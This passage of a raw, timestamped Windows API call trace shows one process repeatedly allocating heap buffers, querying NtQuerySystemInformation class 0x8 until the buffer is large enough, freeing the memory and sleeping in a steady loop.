ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0260.097] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bf28 | out: hHeap=0x2560000) returned 1 [0260.097] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0260.097] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0260.098] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0260.098] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0260.099] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0260.099] Sleep (dwMilliseconds=0x110) [0260.111] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0260.111] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0260.112] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0260.112] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0260.112] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0260.112] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0260.112] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c2b8 [0260.112] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c2b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c2b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0260.113] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c2b8 | out: hHeap=0x2560000) returned 1 [0260.113] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d260 [0260.113] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d260, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d260, ResultLength=0x19ee88*=0xc0) returned 0x0 [0260.114] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d260 | out: hHeap=0x2560000) returned 1 [0260.114] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0260.114] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0260.114] Sleep (dwMilliseconds=0x110) [0260.127] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0260.127] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0260.128] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0260.128] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0260.128] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0260.128] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0260.128] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bfc0 [0260.128] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bfc0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bfc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0260.129] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bfc0 | out: hHeap=0x2560000) returned 1 [0260.129] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0260.129] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0260.129] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0260.129] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0260.129] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0260.129] Sleep (dwMilliseconds=0x110) [0260.138] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0260.138] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0260.138] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0260.138] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0260.142] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0260.142] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0260.142] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295ba68 [0260.142] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ba68, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295ba68, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0260.143] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ba68 | out: hHeap=0x2560000) returned 1 [0260.143] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0260.143] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0260.143] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0260.143] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0260.143] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0260.143] Sleep (dwMilliseconds=0x110) [0260.161] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d590 [0260.161] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d590, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d590, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0260.162] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d590 | out: hHeap=0x2560000) returned 1 [0260.162] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0260.162] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0260.163] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0260.163] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b6d8 [0260.163] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b6d8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b6d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0260.163] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b6d8 | out: hHeap=0x2560000) returned 1 [0260.163] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0260.163] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0260.163] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0260.163] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0260.164] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0260.164] Sleep (dwMilliseconds=0x110) [0260.169] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0260.169] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0260.169] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0260.169] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0260.169] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0260.170] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0260.170] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b640 [0260.170] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b640, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b640, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0260.170] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b640 | out: hHeap=0x2560000) returned 1 [0260.170] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0260.170] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0260.170] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0260.170] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0260.171] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0260.171] Sleep (dwMilliseconds=0x110) [0260.214] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0260.214] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0260.215] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0260.215] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0260.215] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0260.215] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0260.219] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bc30 [0260.219] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bc30, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bc30, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0260.219] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bc30 | out: hHeap=0x2560000) returned 1 [0260.219] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c900 [0260.219] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c900, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c900, ResultLength=0x19ee88*=0xc0) returned 0x0 [0260.220] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c900 | out: hHeap=0x2560000) returned 1 [0260.220] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0260.220] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0260.220] Sleep (dwMilliseconds=0x110) [0260.321] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d590 [0260.322] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d590, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d590, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0260.322] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d590 | out: hHeap=0x2560000) returned 1 [0260.322] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0260.322] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0260.323] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0260.323] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295be90 [0260.323] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295be90, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295be90, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0260.323] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295be90 | out: hHeap=0x2560000) returned 1 [0260.323] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d0d0 [0260.323] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d0d0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d0d0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0260.324] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d0d0 | out: hHeap=0x2560000) returned 1 [0260.324] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0260.324] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0260.324] Sleep (dwMilliseconds=0x110) [0260.470] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0260.470] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0260.470] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0260.470] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0260.470] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0260.471] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0260.471] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b510 [0260.471] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b510, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b510, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0260.471] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b510 | out: hHeap=0x2560000) returned 1 [0260.471] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d0d0 [0260.471] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d0d0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d0d0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0260.472] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d0d0 | out: hHeap=0x2560000) returned 1 [0260.472] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0260.472] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0260.472] Sleep (dwMilliseconds=0x110) [0260.492] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0260.492] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0260.493] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0260.493] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285abc0 [0260.493] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285abc0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285abc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0260.493] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285abc0 | out: hHeap=0x2560000) returned 1 [0260.493] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb00 [0260.493] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb00, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb00, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0260.494] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb00 | out: hHeap=0x2560000) returned 1 [0260.494] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d260 [0260.494] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d260, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d260, ResultLength=0x19ee88*=0xc0) returned 0x0 [0260.495] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d260 | out: hHeap=0x2560000) returned 1 [0260.495] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0260.496] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0260.496] Sleep (dwMilliseconds=0x110) [0260.515] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0260.515] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0260.516] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0260.516] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0260.516] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0260.517] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0260.517] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b938 [0260.517] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b938, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b938, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0260.518] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b938 | out: hHeap=0x2560000) returned 1 [0260.518] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d0d0 [0260.518] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d0d0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d0d0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0260.519] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d0d0 | out: hHeap=0x2560000) returned 1 [0260.519] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0260.520] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0260.520] Sleep (dwMilliseconds=0x110) [0260.570] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d590 [0260.570] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d590, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d590, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0260.571] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d590 | out: hHeap=0x2560000) returned 1 [0260.571] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0260.571] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0260.572] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0260.572] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c0f0 [0260.572] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c0f0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c0f0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0260.572] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c0f0 | out: hHeap=0x2560000) returned 1 [0260.572] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0260.572] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0260.573] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0260.573] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0260.573] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0260.573] Sleep (dwMilliseconds=0x110) [0260.581] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d830 [0260.581] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d830, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d830, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0260.582] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d830 | out: hHeap=0x2560000) returned 1 [0260.582] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0260.582] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0260.583] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0260.583] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bdf8 [0260.583] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bdf8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bdf8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0260.583] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bdf8 | out: hHeap=0x2560000) returned 1 [0260.583] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c838 [0260.583] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c838, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c838, ResultLength=0x19ee88*=0xc0) returned 0x0 [0260.584] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c838 | out: hHeap=0x2560000) returned 1 [0260.584] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0260.585] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0260.585] Sleep (dwMilliseconds=0x110) [0260.683] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d600 [0260.683] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d600, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d600, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0260.684] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d600 | out: hHeap=0x2560000) returned 1 [0260.684] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a748 [0260.685] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a748, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a748, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0260.685] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a748 | out: hHeap=0x2560000) returned 1 [0260.685] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c2b8 [0260.685] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c2b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c2b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0260.686] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c2b8 | out: hHeap=0x2560000) returned 1 [0260.686] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c838 [0260.686] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c838, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c838, ResultLength=0x19ee88*=0xc0) returned 0x0 [0260.686] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c838 | out: hHeap=0x2560000) returned 1 [0260.686] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0260.686] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0260.686] Sleep (dwMilliseconds=0x110) [0260.714] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0260.714] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0260.715] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0260.716] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ac28 [0260.716] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ac28, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ac28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0260.717] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ac28 | out: hHeap=0x2560000) returned 1 [0260.717] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c2b8 [0260.717] 